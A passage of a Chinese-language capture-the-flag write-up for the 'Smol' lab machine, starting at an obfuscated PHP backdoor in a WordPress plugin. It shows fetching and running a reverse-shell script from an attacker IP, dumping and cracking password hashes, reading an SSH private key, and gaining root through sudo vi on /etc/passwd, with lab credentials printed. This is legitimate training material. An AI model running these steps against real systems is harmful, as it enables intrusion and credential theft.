 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

里外俩看起来一样,查看一下:

┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\155\x64"      
cmd                                                                                                                                                                                             
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\x6d\144"
cmd 

明显是一个后门,尝试进行利用弹一个shell:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/hello.php?cmd=wget+http://192.168.10.101:8888/revshell.sh+-O+/tmp/revshell.sh" 

其他常见的命令都没有回显,不得不怀疑是否可以运行,再翻翻吧,发现好像是一个放歌的插件,且没啥用。。。。。

翻着翻着我找到了这个插件的启用位置:

image-20250607140832735

每次开启后台会显示,看一下我们的那个后台是否存在这个,如果存在意味着在后台界面存在hello.php的调用,即可尝试进行反弹shell:

image-20250607141011103

找到了,八嘎!!!!

image-20250607141043009

尝试进行执行命令以及反弹shell!!!!

image-20250607141739005

尝试反弹,但是发现执行不了,尝试上传文件进行反弹:

http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.10.101:8888/revshell.sh -O /tmp/revshell.sh

image-20250607142254599

发现请求成功了,尝试执行:

http://www.smol.hmv/wp-admin/index.php?cmd=/bin/bash%20/tmp/revshell.sh

image-20250607142413973

弹过来了!!!!

提权

稳定shell

老样子。。。。

python3 -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
# kali stty size
stty rows 44 columns 189

信息搜集

www-data@smol:/var/www/wordpress/wp-admin$ cd ~
www-data@smol:/var/www$ ls -la
total 16
drwxr-xr-x  4 root     root     4096 Mar 29  2024 .
drwxr-xr-x 13 root     root     4096 Mar 29  2024 ..
drwxr-xr-x  2 root     root     4096 Mar 29  2024 html
drwxr-x---  5 www-data www-data 4096 Jun  7 02:03 wordpress
www-data@smol:/var/www$ cd html
www-data@smol:/var/www/html$ ls -la
total 24
drwxr-xr-x 2 root root  4096 Mar 29  2024 .
drwxr-xr-x 4 root root  4096 Mar 29  2024 ..
-rw-r--r-- 1 root root 10918 Mar 29  2024 index.html.default
-rw-r--r-- 1 root root   258 Mar 29  2024 index.php
www-data@smol:/var/www/html$ cd ../wordpress/
www-data@smol:/var/www/wordpress$ ls -la
total 252
drwxr-x---  5 www-data www-data  4096 Jun  7 02:03 .
drwxr-xr-x  4 root     root      4096 Mar 29  2024 ..
-rw-r--r--  1 www-data www-data   523 Aug 16  2023 .htaccess
-rw-r--r--  1 www-data www-data   405 Aug 16  2023 index.php
-rw-r--r--  1 www-data www-data 19903 Jun  7 02:02 license.txt
-rw-r--r--  1 www-data www-data  7425 Jun  7 02:02 readme.html
-rw-r--r--  1 www-data www-data  7387 Jun  7 02:02 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Aug 16  2023 wp-admin
-rw-r--r--  1 www-data www-data   351 Aug 16  2023 wp-blog-header.php
-rw-r--r--  1 www-data www-data  2323 Aug 16  2023 wp-comments-post.php
-rw-r--r--  1 www-data www-data  3336 Jun  7 02:02 wp-config-sample.php
-rw-r--r--  1 www-data www-data  3008 Mar 29  2024 wp-config.php
drwxr-xr-x  8 www-data www-data  4096 Jun  7 02:03 wp-content
-rw-r--r--  1 www-data www-data  5617 Jun  7 02:02 wp-cron.php
drwxr-xr-x 30 www-data www-data 16384 Jun  7 02:02 wp-includes
-rw-r--r--  1 www-data www-data  2502 Aug 16  2023 wp-links-opml.php
-rw-r--r--  1 www-data www-data  3937 Jun  7 02:02 wp-load.php
-rw-r--r--  1 www-data www-data 51414 Jun  7 02:02 wp-login.php
-rw-r--r--  1 www-data www-data  8727 Jun  7 02:02 wp-mail.php
-rw-r--r--  1 www-data www-data 30081 Jun  7 02:02 wp-settings.php
-rw-r--r--  1 www-data www-data 34516 Jun  7 02:02 wp-signup.php
-rw-r--r--  1 www-data www-data  5102 Jun  7 02:02 wp-trackback.php
-rw-r--r--  1 www-data www-data  3205 Jun  7 02:02 xmlrpc.php
www-data@smol:/var/www/wordpress$ cat /etc/passwd | grep sh | cut -d: -f1
root
sshd
think
fwupd-refresh
xavi
diego
gege
www-data@smol:/var/www/wordpress$ ls -la /home/
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  2 diego internal 4096 Aug 18  2023 diego
drwxr-x---  2 gege  internal 4096 Aug 18  2023 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi

数据库泄露

尝试看一下数据库:

www-data@smol:/var/www/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 524
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
5 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from wp_users;
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                                                       | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              | admin         | admin@smol.thm     | http://www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |
|  2 | wpuser     | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp            | wp@smol.thm        | http://smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/                              | think         | josemlwdf@smol.thm | http://smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1                              | gege          | gege@smol.thm      | http://smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              | diego         | diego@smol.thm     | http://smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/                              | xavi          | xavi@smol.thm      | http://smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)

mysql> select user_nicename,user_login,user_pass from wp_users;
+---------------+------------+-----------------------------------------------------------------+
| user_nicename | user_login | user_pass                                                       |
+---------------+------------+-----------------------------------------------------------------+
| admin         | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              |
| wp            | wpuser     | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |
| think         | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/                              |
| gege          | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1                              |
| diego         | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              |
| xavi          | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/                              |
+---------------+------------+-----------------------------------------------------------------+
6 rows in set (0.00 sec)

尝试进行破译:

admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0
wpuser:$wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m
think:$P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/
gege:$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
diego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
xavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN/
┌──(kali💀kali)-[~/temp/Smol]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (diego)     
1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g/s 2372p/s 9992c/s 9992C/s lilmami503..lilmama_c
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session aborted

破解即可拿到密码:diego:sandiegocalifornia ,尽管开启了ssh服务,但是禁止登录。。。。

image-20250607144723756

相同组权限读取凭证切换用户

diego@smol:~$ ls -la
total 24
drwxr-x--- 2 diego internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego     220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 diego diego    3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 diego diego     807 Feb 25  2020 .profile
-rw-r--r-- 1 root  root       33 Aug 16  2023 user.txt
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
diego@smol:~$ cat user.txt 
45edaec653ff9ee06236b7ce72b86963
diego@smol:~$ sudo -l
[sudo] password for diego: 
Sorry, user diego may not run sudo on smol.
diego@smol:~$ whoami;id
diego
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:~$ ls -la ../
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  2 diego internal 4096 Aug 18  2023 diego
drwxr-x---  2 gege  internal 4096 Aug 18  2023 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi

之前注意到四个相同组权限的用户,尝试看一下有没有有效信息:

diego@smol:~$ cd ../gege
diego@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip
diego@smol:/home/gege$ cd ../think
diego@smol:/home/think$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
diego@smol:/home/think$ cd .ssh
diego@smol:/home/think/.ssh$ ls -la
total 20
drwxr-xr-x 2 think think    4096 Jun 21  2023 .
drwxr-x--- 5 think internal 4096 Jan 12  2024 ..
-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys
-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa
-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub
diego@smol:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
diego@smol:/home/think/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cd ../../xavi/
diego@smol:/home/xavi$ ls -la
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 xavi xavi     3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 xavi xavi      807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root        9 Aug 18  2023 .viminfo -> /dev/null

找到了一个备份以及一个可供ssh凭证登录的用户,先登录上去再说吧:

image-20250607145414287

su配置文件无密码切换

信息搜集发现:

think@smol:~$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
think@smol:~$ whoami;id
think
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)
think@smol:~$ cat /etc/group | grep dev
plugdev:x:46:
dev:x:1004:think,gege
think@smol:~$ cd ../gege
think@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip

thinkgege用户属于同一个组权限范围内,这里估计就是要从think跳到gege中进行操作,但是没啥头绪,上传一个linpeas.sh进行扫描。。。但是没发现啥大鱼,看了一些师傅的wp,发现这里可以直接进行切换,看来是修改了配置文件,看一下:

think@smol:/tmp$ cat /etc/pam.d/su | grep auth
auth       sufficient pam_rootok.so
auth  [success=ignore default=1] pam_succeed_if.so user = gege
auth  sufficient                 pam_succeed_if.so use_uid user = think
# auth       required   pam_wheel.so
# auth       sufficient pam_wheel.so trust
# auth       required   pam_wheel.so deny group=nosu
# The standard Unix authentication modules, used with
@include common-auth

说明think是被信任的用户,切换:

image-20250607151547211

破解备份文件

把文件传到本地看看备份了些啥,但是解压的时候发现是需要密码的。。。。尝试破解一下:

┌──(kali💀kali)-[~/temp/Smol]
└─$ zip2john wordpress.old.zip > ziphash
-----------
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hero_gege@hotmail.com (wordpress.old.zip)     
1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g/s 4306Kp/s 4306Kc/s 4306KC/s hesse..hermosa_jessy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

知道密码即可进行解压:

┌──(kali💀kali)-[~/temp/Smol]
└─$ ll
total 31544
-rw-r--r-- 1 kali kali     4571 Jun  6 22:13 cms.log
-rw-rw-r-- 1 kali kali      274 Jun  7 02:37 hash
-rw------- 1 kali kali     2602 Jun  7 02:52 id_rsa
-rw-r--r-- 1 kali kali      517 Jun  6 22:13 reports.json
drwxr-xr-x 4 kali kali     4096 Jun  6 22:06 Result
-rw-rw-r-- 1 kali kali       50 Jun  7 01:17 revshell.sh
-rw-rw-r-- 1 kali kali 32266546 Aug 16  2023 wordpress.old.zip
-rw-rw-r-- 1 kali kali     1192 Jun  7 03:19 ziphash

┌──(kali💀kali)-[~/temp/Smol]
└─$ unzip wordpress.old.zip
Archive:  wordpress.old.zip
   creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password: 
  inflating: wordpress.old/wp-config.php  
  inflating: wordpress.old/index.php  
  inflating: wordpress.old/wp-comments-post.php  
  inflating: wordpress.old/xmlrpc.php  
  inflating: wordpress.old/license.txt  
  inflating: wordpress.old/wp-login.php  
   creating: wordpress.old/wp-content/
 extracting: wordpress.old/wp-content/index.php  
   creating: wordpress.old/wp-content/plugins/
   ----------------
  inflating: wordpress.old/wp-admin/export.php  
  inflating: wordpress.old/wp-admin/options-writing.php  
  inflating: wordpress.old/wp-admin/users.php  
  inflating: wordpress.old/wp-admin/options-media.php  
  inflating: wordpress.old/wp-admin/edit.php  
  inflating: wordpress.old/wp-admin/import.php  
  inflating: wordpress.old/wp-admin/revision.php

进行搜索发现比较敏感的配置文件:

┌──(kali💀kali)-[~/temp/Smol]
└─$ cd wordpress.old 

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ ll
total 228
-rw-r--r--  1 kali kali   405 Aug 16  2023 index.php
-rw-r--r--  1 kali kali 19915 Aug 16  2023 license.txt
-rw-r--r--  1 kali kali  7399 Aug 16  2023 readme.html
-rw-r--r--  1 kali kali  7211 Aug 16  2023 wp-activate.php
drwxr-xr-x  9 kali kali  4096 Aug 16  2023 wp-admin
-rw-r--r--  1 kali kali   351 Aug 16  2023 wp-blog-header.php
-rw-r--r--  1 kali kali  2323 Aug 16  2023 wp-comments-post.php
-rw-r--r--  1 kali kali  2994 Aug 16  2023 wp-config.php
drwxr-xr-x  7 kali kali  4096 Aug 16  2023 wp-content
-rw-r--r--  1 kali kali  5638 Aug 16  2023 wp-cron.php
drwxr-xr-x 27 kali kali 12288 Aug 16  2023 wp-includes
-rw-r--r--  1 kali kali  2502 Aug 16  2023 wp-links-opml.php
-rw-r--r--  1 kali kali  3927 Aug 16  2023 wp-load.php
-rw-r--r--  1 kali kali 49441 Aug 16  2023 wp-login.php
-rw-r--r--  1 kali kali  8537 Aug 16  2023 wp-mail.php
-rw-r--r--  1 kali kali 25602 Aug 16  2023 wp-settings.php
-rw-r--r--  1 kali kali 34385 Aug 16  2023 wp-signup.php
-rw-r--r--  1 kali kali  4885 Aug 16  2023 wp-trackback.php
-rw-r--r--  1 kali kali  3236 Aug 16  2023 xmlrpc.php

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ cat wp-config.php 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'xavi' );

/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', true );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

得到新的凭证:

xavi
P@ssw0rdxavi@

进行切换:

image-20250607152548920

编辑/etc/passwd获取rootshell

xavi@smol:~$ sudo -l
[sudo] password for xavi: 
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd

发现可以编辑/etc/passwd文件,添加凭证进行添加高权限用户,或是直接使用vi的命令模式获取shell皆可:

vi的命令模式

image-20250607152846462

image-20250607152902834

添加高权限用户

添加一个root权限的用户也很好,感觉这是作者想考的,或是把root密码置空root::0:0:root:/root:/usr/bin/bash

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ openssl passwd -1 -salt kali kali  
$1$kali$/rLA3oVIdYGokOY9m1jKj.

image-20250607153442406

root@smol:/home/xavi$ cd ~
root@smol:~$ ls -la
total 64K
drwx------  7 root root 4.0K Jun  7 07:34 .
drwxr-xr-x 18 root root 4.0K Mar 29  2024 ..
lrwxrwxrwx  1 root root    9 Jun  2  2023 .bash_history -> /dev/null
